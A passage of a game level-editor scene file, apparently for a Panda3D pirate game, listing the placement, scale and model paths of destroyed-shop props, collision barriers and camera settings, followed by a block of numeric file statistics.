'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-88.582, 0.0, 0.0),'Pos': Point3(42.143, -15.392, 6.297),'Scale': VBase3(1.147, 1.147, 1.147),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff_skull'}},'1276275771.91caoconno': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': VBase3(-151.048, 0.0, 0.0),'Pos': Point3(-18.821, 22.007, 12.068),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateC_destroyed'}},'1276275849.16caoconno': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(-0.1, 0.0, 0.0),'Pos': Point3(-16.716, 28.591, 12.069),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateB_destroyed'}},'1276275913.72caoconno': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(81.975, 0.0, 0.0),'Objects': {'1276277085.36caoconno': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateA_destroyed'}}},'Pos': Point3(3.904, 20.76, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateA_destroyed'}},'1276276656.64caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(-0.636, -14.082, 14.483),'Pos': Point3(9.507, 20.895, 0.075),'Scale': VBase3(0.614, 0.614, 0.614),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_barrelSideways_destroyed'}},'1276276761.84caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(10.313, 17.264, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_cnt_barrelC_destroyed'}},'1276276898.97caoconno': {'Type': 'Barrel','DisableCollision': 
True,'Holiday': '','Hpr': VBase3(-46.638, 0.047, -90.045),'Pos': Point3(12.996, 17.769, 1.142),'Scale': VBase3(0.541, 0.541, 0.541),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_barrelB_destroyed'}},'1276277250.06caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 34.976),'Pos': Point3(-13.263, 21.657, 0.092),'Scale': VBase3(0.614, 0.614, 0.614),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_barrelSideways_destroyed'}},'1276278278.09caoconno': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(68.731, 49.719, -77.878),'Pos': Point3(15.157, -30.467, 6.37),'Scale': VBase3(0.421, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_beam'}},'1276279077.38caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(35.612, -2.691, -0.522),'Pos': Point3(25.664, -25.666, 0.188),'Scale': VBase3(0.681, 0.681, 0.681),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardA'}},'1276279087.64caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(45.35, -10.992, 175.068),'Pos': Point3(31.359, 23.275, 12.482),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276279113.08caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(142.66, -3.12, -0.604),'Pos': Point3(-1.755, 17.757, 0.643),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_boardA'}},'1276279130.95caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-10.192, 18.147, 12.068),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoA'}},'1276280787.84caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-35.493, 3.257, 0.0),'Pos': 
Point3(-0.25, 16.77, 0.694),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276280881.31caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-6.923, 60.032, 37.792),'Pos': Point3(33.223, 24.238, 13.848),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276280903.86caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(123.673, 2.878, 3.885),'Pos': Point3(33.805, 22.317, 12.388),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276281003.14caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(2.758, -18.885, 0.244),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoC'}},'1276281034.33caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-0.357, 17.611, -0.168),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoA'}},'1276281060.67caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-81.162, 0.0, 0.0),'Pos': Point3(6.482, 13.146, 0.09),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoC'}},'1276281452.61caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-176.25, -1.059, -1.85),'Pos': Point3(0.663, -20.778, 0.607),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_boardA'}},'1276281527.78caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(173.27, 0.0, 0.0),'Pos': Point3(31.054, 23.758, 12.067),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276281535.05caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-71.069, 0.0, 0.0),'Pos': Point3(-13.005, -21.346, 12.069),'Scale': VBase3(0.608, 0.608, 0.608),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276281562.19caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(25.652, 23.758, 12.067),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276281609.44caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-87.387, 0.0, 0.0),'Pos': Point3(18.435, -27.532, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276282879.52caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-17.579, 2.137, -1.829),'Pos': Point3(-5.306, 11.299, 12.314),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardA'}},'1276282964.03caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(8.295, -21.13, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276290221.34caoconno': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-131.931, -74.018, 14.279),'Pos': Point3(5.841, 17.88, 1.403),'Scale': VBase3(0.483, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_beam'}},'1276290315.28caoconno': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(111.719, -62.98, -65.667),'Pos': Point3(12.258, -29.597, 3.448),'Scale': VBase3(0.705, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_beam'}},'1276290526.81caoconno': {'Type': 'Collision 
Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-75.54, 0.0, 0.0),'Pos': Point3(41.04, 4.103, -0.466),'Scale': VBase3(0.801, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276290564.5caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(168.642, 0.0, 0.0),'Pos': Point3(27.489, -26.319, -0.466),'Scale': VBase3(0.483, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276290607.91caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-135.502, 0.0, 0.0),'Pos': Point3(23.385, -27.559, -0.466),'Scale': VBase3(0.483, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276291879.27caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-37.866, 0.0, 0.0),'Pos': Point3(-1.924, 17.812, 0.0),'Scale': VBase3(1.304, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276291898.09caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(16.724, 0.0, 0.0),'Pos': Point3(8.213, 15.448, 0.0),'Scale': VBase3(1.103, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276291923.52caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(116.877, 0.0, 0.0),'Pos': Point3(12.043, 20.051, 0.0),'Scale': VBase3(0.676, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276530477.89caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(102.934, 2.264, 179.48),'Pos': Point3(-7.693, -9.189, 3.549),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 
'models/props/shop_voodoo_doll'}},'1276531019.5caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.883, 0.0, 0.0),'Pos': Point3(13.601, -28.855, -0.466),'Scale': VBase3(1.822, 1.0, 2.003),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276531170.86caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-127.789, 0.0, 0.0),'Pos': Point3(31.18, -25.054, -0.466),'Scale': VBase3(0.974, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276531673.56caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-14.464, -2.762, -0.307),'Scale': VBase3(2.949, 4.247, 1.874),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}},'1276551367.75caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(30.263, 0.0, -37.656),'Pos': Point3(39.214, 23.501, 24.156),'RenderEffect': False,'Scale': VBase3(3.804, 3.804, 3.804),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_a'}},'1276551376.2caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(130.616, 0.0, 24.675),'Pos': Point3(1.258, -24.271, 7.365),'RenderEffect': False,'Scale': VBase3(2.406, 2.406, 2.406),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_b'}},'1276551501.94caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(39.427, 0.0, 0.0),'Pos': Point3(-15.556, -30.782, 24.004),'RenderEffect': False,'Scale': VBase3(3.56, 3.56, 3.56),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_a'}},'1276551670.0caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(7.859, 0.0, 0.0),'Pos': Point3(-20.16, 0.585, 11.673),'RenderEffect': False,'Scale': VBase3(1.787, 1.787, 1.787),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_cav_web_b'}},'1276551731.52caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-138.437, 0.0, 0.0),'Pos': Point3(-19.939, -26.565, 11.794),'RenderEffect': False,'Scale': VBase3(3.215, 3.215, 3.215),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_b'}},'1276551807.03caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-30.774, 0.0, 0.0),'Pos': Point3(-20.858, 25.184, 11.747),'RenderEffect': False,'Scale': VBase3(2.761, 2.761, 2.761),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_a'}},'1276710561.61caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.012, 0.0, 0.0),'Pos': Point3(6.61, 23.113, 0.0),'Scale': VBase3(0.787, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}},'Visual': {'Model': 'models/buildings/pir_m_int_shn_store_destroyed'}}},'Node Links': [],'Layers': {},'ObjectIds': {'1156268617.43dzlu0s': '["Objects"]["1156268617.43dzlu0s"]','1167851208.51kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851208.51kmuller"]','1167851297.48kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851297.48kmuller"]','1167851350.63kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851350.63kmuller"]','1167851586.93kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851586.93kmuller"]','1167851649.96kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851649.96kmuller"]','1167851807.53kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851807.53kmuller"]','1167851894.7kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851894.7kmuller"]','1167851921.09kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851921.09kmuller"]','1167852002.85kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167852002.85kmuller"]','1167852037.59kmuller': 
'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167852037.59kmuller"]','1167853082.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853082.76kmuller"]','1167853258.42kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853258.42kmuller"]','1167853323.74kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853323.74kmuller"]','1167853393.98kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853393.98kmuller"]','1167853497.35kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853497.35kmuller"]','1167853515.07kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853515.07kmuller"]','1167854100.26kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167854100.26kmuller"]','1167867245.29kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167867245.29kmuller"]','1167867305.85kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167867305.85kmuller"]','1167867328.81kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167867328.81kmuller"]','1167954371.88kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954371.88kmuller"]','1167954448.33kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954448.33kmuller"]','1167954476.21kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954476.21kmuller"]','1167954660.96kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954660.96kmuller"]','1167954776.51kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954776.51kmuller"]','1167954805.24kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954805.24kmuller"]','1167957475.65kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957475.65kmuller"]','1167957685.83kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957685.83kmuller"]','1167957751.15kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957751.15kmuller"]','1167957802.44kmuller': 
'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957802.44kmuller"]','1167957927.05kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957927.05kmuller"]','1167958029.74kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958029.74kmuller"]','1167958411.18kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958411.18kmuller"]','1167958482.3kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958482.3kmuller"]','1167958587.96kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958587.96kmuller"]','1167958623.43kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958623.43kmuller"]','1167958659.04kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958659.04kmuller"]','1167958695.37kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958695.37kmuller"]','1167958771.16kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958771.16kmuller"]','1167958796.77kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958796.77kmuller"]','1167958843.83kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958843.83kmuller"]','1167958939.32kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958939.32kmuller"]','1167959032.44kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959032.44kmuller"]','1167959049.71kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959049.71kmuller"]','1167959560.85kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959560.85kmuller"]','1167959641.15kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959641.15kmuller"]','1167971424.47kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971424.47kmuller"]','1167971619.35kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971619.35kmuller"]','1167971752.08kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971752.08kmuller"]','1167971774.92kmuller': 
'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971774.92kmuller"]','1167971834.25kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971834.25kmuller"]','1174700283.27dzlu': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1174700283.27dzlu"]','1174700441.91dzlu': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1174700441.91dzlu"]','1181175670.12kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181175670.12kmuller"]','1181175794.6kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181175794.6kmuller"]','1181175917.18kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853497.35kmuller"]["Objects"]["1181175917.18kmuller"]','1181175986.39kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181175986.39kmuller"]','1181176040.37kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181176040.37kmuller"]','1181244708.62kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181244708.62kmuller"]','1185470127.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470127.76kmuller"]','1185470337.59kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470337.59kmuller"]','1185470390.84kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470390.84kmuller"]','1185470441.36kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470441.36kmuller"]','1185470544.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470544.76kmuller"]','1185470574.67kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470574.67kmuller"]','1185473733.65kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473733.65kmuller"]','1185473757.92kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473757.92kmuller"]','1185473855.14kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473855.14kmuller"]','1185473892.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473892.76kmuller"]','1185474062.46kmuller': 
'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185474062.46kmuller"]','1185474078.9kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185474078.9kmuller"]','1185474160.92kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185474160.92kmuller"]','1257882161.54caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882161.54caoconno"]','1257882301.33caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882301.33caoconno"]','1257882430.02caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882430.02caoconno"]','1257882492.33caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882492.33caoconno"]','1257882618.84caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882618.84caoconno"]','1257882758.42caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882758.42caoconno"]','1257882773.01caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882773.01caoconno"]','1257882905.81caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882905.81caoconno"]','1257883001.32caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883001.32caoconno"]','1257883095.16caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883095.16caoconno"]','1257883215.54caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883215.54caoconno"]','1257883292.66caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883292.66caoconno"]','1276275771.91caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275771.91caoconno"]','1276275849.16caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275849.16caoconno"]','1276275913.72caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275913.72caoconno"]','1276276656.64caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276276656.64caoconno"]','1276276761.84caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276276761.84caoconno"]','1276276898.97caoconno': 
'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276276898.97caoconno"]','1276277085.36caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275913.72caoconno"]["Objects"]["1276277085.36caoconno"]','1276277250.06caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276277250.06caoconno"]','1276278278.09caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276278278.09caoconno"]','1276279077.38caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279077.38caoconno"]','1276279087.64caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279087.64caoconno"]','1276279113.08caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279113.08caoconno"]','1276279130.95caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279130.95caoconno"]','1276280787.84caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276280787.84caoconno"]','1276280881.31caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276280881.31caoconno"]','1276280903.86caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276280903.86caoconno"]','1276281003.14caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281003.14caoconno"]','1276281034.33caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281034.33caoconno"]','1276281060.67caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281060.67caoconno"]','1276281452.61caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281452.61caoconno"]','1276281527.78caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281527.78caoconno"]','1276281535.05caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281535.05caoconno"]','1276281562.19caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281562.19caoconno"]','1276281609.44caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281609.44caoconno"]','1276282879.52caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276282879.52caoconno"]','1276282964.03caoconno': 
'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276282964.03caoconno"]','1276290221.34caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290221.34caoconno"]','1276290315.28caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290315.28caoconno"]','1276290526.81caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290526.81caoconno"]','1276290564.5caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290564.5caoconno"]','1276290607.91caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290607.91caoconno"]','1276291879.27caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276291879.27caoconno"]','1276291898.09caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276291898.09caoconno"]','1276291923.52caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276291923.52caoconno"]','1276530477.89caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276530477.89caoconno"]','1276531019.5caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276531019.5caoconno"]','1276531170.86caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276531170.86caoconno"]','1276531673.56caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276531673.56caoconno"]','1276551367.75caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551367.75caoconno"]','1276551376.2caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551376.2caoconno"]','1276551501.94caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551501.94caoconno"]','1276551670.0caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551670.0caoconno"]','1276551731.52caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551731.52caoconno"]','1276551807.03caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551807.03caoconno"]','1276710561.61caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276710561.61caoconno"]'}}
# Level-editor viewport state saved with this scene: camera position/orientation
# (Panda3D Point3/VBase3 — assumed imported by the enclosing file), focal length,
# sky preset index, and fog toggle. NOTE(review): exact semantics of skyState=-2
# are not visible here — confirm against the editor code that reads it.
extraInfo = {'camPos': Point3(-1.02564, -2.3457, 20.516),'camHpr': VBase3(20.7195, -16.0984, 0),'focalLength': 1.02199995518,'skyState': -2,'fog': 0}
| 16,504.333333
| 49,304
| 0.679438
| 6,696
| 49,513
| 4.956093
| 0.137843
| 0.021696
| 0.020882
| 0.017116
| 0.587899
| 0.485747
| 0.467968
| 0.409751
| 0.33038
| 0.293527
| 0
| 0.267633
| 0.048169
| 49,513
| 3
| 49,305
| 16,504.333333
| 0.436535
| 0
| 0
| 0
| 0
| 0
| 0.560104
| 0.311124
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
